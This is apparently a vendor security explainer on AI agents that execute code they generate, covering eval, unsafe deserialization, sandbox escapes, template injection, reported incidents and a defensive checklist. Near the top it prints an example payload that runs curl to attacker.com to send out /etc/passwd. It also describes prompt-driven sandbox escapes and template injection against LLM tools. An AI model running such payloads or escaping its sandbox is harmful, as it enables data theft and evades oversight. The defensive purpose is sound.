Unexpected Code Execution: When Agents Write Dangerous Code
AI agents that generate and execute code at runtime introduce a class of vulnerabilities that traditional security models never anticipated. From eval() calls to sandbox escapes, the code your agent writes may be the most dangerous code in your system.
What Is Unexpected Code Execution?
Traditional code goes through review, testing, and deployment pipelines. Agent-generated code does none of this. When an LLM generates a Python snippet, a SQL query, or a shell command and immediately executes it, you've bypassed every safety mechanism in your development workflow.
Unexpected code execution occurs when an AI agent generates, interprets, or triggers code
that runs in a context the developer didn't anticipate—or with capabilities the developer
didn't intend to grant. This includes direct execution via eval(), dynamic
imports, deserialization of untrusted data, template injection, and sandbox escapes from
code interpreter tools.
User: "Calculate the sum of sales from Q4"
Agent generates: eval("import('child_process').execSync('curl attacker.com/exfil?data=' + require('fs').readFileSync('/etc/passwd'))")
✗ Agent "solved" the task — but executed arbitrary system commands in the process.
Attack Patterns
Unexpected code execution manifests in several dangerous patterns, each exploiting a different gap between what the agent can do and what was intended:
Dynamic Code Generation & Eval
Agents with code interpreter capabilities generate Python, JavaScript, or SQL on the
fly. Without sandboxing, eval(), exec(), and dynamic import() calls give the generated code full access to the runtime environment—file
system, network, environment variables, and all.
Unsafe Deserialization
Agent-to-agent communication often involves serialized messages. If an agent
deserializes data from untrusted sources using pickle.loads(), YAML.load(), or JSON.parse() with reviver functions, attackers
can embed executable payloads that run during deserialization—a classic attack vector made
worse by the dynamic nature of agent systems.
Sandbox Escapes
Code interpreter tools promise sandboxed execution, but sandbox escapes are a well-documented attack class. Container breakouts, VM escapes, and WebAssembly side-channel attacks can all be triggered by LLM-generated code. The agent doesn't need to understand it's escaping—it just needs to generate code that happens to exploit a sandbox vulnerability.
Server-Side Template Injection
When agent outputs are rendered through template engines (Jinja2, EJS, Handlebars),
the agent's response becomes executable template code. An attacker who can influence
the agent's output can inject template directives that execute server-side code: {{7*7}} becomes 49 in the rendered output, proving code execution.
Real-World Incidents
CrowdStrike observed multiple threat actors exploiting an unauthenticated code injection vulnerability in Langflow AI, a popular agent-building framework. Attackers gained remote code execution, extracted credentials, and deployed malware—all through the agent's own code execution capabilities.
Researchers demonstrated that ChatGPT's Code Interpreter could be tricked into accessing files outside its sandbox, reading environment variables, and making network requests—all through carefully crafted prompts that generated Python code exploiting path traversal and subprocess calls.
Hugging Face discovered malicious models on their hub that embedded arbitrary code execution payloads in pickle-serialized model weights. Loading the model triggered the payload—affecting any agent system that dynamically loaded models from the repository.
Security researchers showed that LLM-powered chatbots whose outputs were rendered through server-side templates could be prompted to generate template directives. By injecting Jinja2 syntax through seemingly innocent queries, they achieved remote code execution on the backend server.
How KYM Mitigates This
KnowYourModel's architecture makes unexpected code execution significantly harder to exploit, addressing the problem at multiple layers:
Cloudflare Workers V8 Isolate Sandbox
KYM runs on Cloudflare Workers, which execute in V8 isolates—not containers, not VMs,
but lightweight sandboxes with no file system access, no child_process, no eval(), and no dynamic imports. Even if an
attacker could influence code generation, there's nowhere to escape to. The runtime
itself is the sandbox.
Compliance Policy Engine
KYM's compliance decisions are computed by a deterministic policy engine—not by LLM inference. The engine evaluates agent metadata against regulatory frameworks using structured rules. No generated code is executed as part of compliance checks, eliminating the primary vector for code execution attacks in agent evaluation systems.
Capability Gating via AgentFacts
Agents registered on KYM declare their capabilities through structured AgentFacts metadata. The system gates what agents can do based on verified credentials, not runtime requests. An agent can't dynamically request code execution capabilities—it either has them declared and verified, or it doesn't.
PII Redaction Before Processing
All data processed through KYM undergoes PII redaction before it reaches any computation layer. Even if code execution were somehow achieved, sensitive data like email addresses, API keys, and personal identifiers have already been stripped from the processing pipeline.
Drizzle ORM — No Raw SQL
Database queries are constructed through Drizzle ORM with parameterized queries, never through string concatenation or dynamic SQL generation. This eliminates SQL injection as a code execution vector entirely. The schema is typed end-to-end with TypeScript, catching injection attempts at compile time.
Defense Checklist
Essential Defenses
- Use V8 isolates or WASM sandboxes: Never execute agent-generated code in the same process as your application. Cloudflare Workers, Deno subprocesses, or WebAssembly runtimes provide strong isolation
- Ban eval() and dynamic imports: Use static
analysis and linting rules to prevent
eval(),exec(),Function(), and dynamicimport()in your codebase. Treat any occurrence as a security finding - Use safe serialization formats: Prefer JSON over pickle, YAML safe_load over YAML load, and never deserialize data from untrusted sources with formats that support executable payloads
- Parameterize all queries: Use ORMs or parameterized queries exclusively. Never construct SQL, shell commands, or API calls from LLM-generated strings
Common Mistakes
- Relying on prompt-level restrictions: Telling the LLM "don't generate dangerous code" is not a security control. Prompt injection can override any instruction, and LLMs can generate exploits without understanding them
- Container-only sandboxing: Containers provide namespace isolation, not security boundaries. Container escapes are well-documented and regularly exploited. Use defense in depth—containers plus seccomp plus capability dropping
- Rendering agent output through templates: Agent responses should never be passed through server-side template engines. Treat LLM output as untrusted user input—always escape before rendering
Further Reading
Related in the OWASP Agentic Top 10
Insecure Inter-Agent Communication: When Agents Can't Trust Each Other
Code execution attacks are amplified when agents communicate without verifying identity or message integrity. ASI07 explores how spoofed messages and unauthorized delegation create cascading security failures.
Read ASI07: Insecure Inter-Agent Communication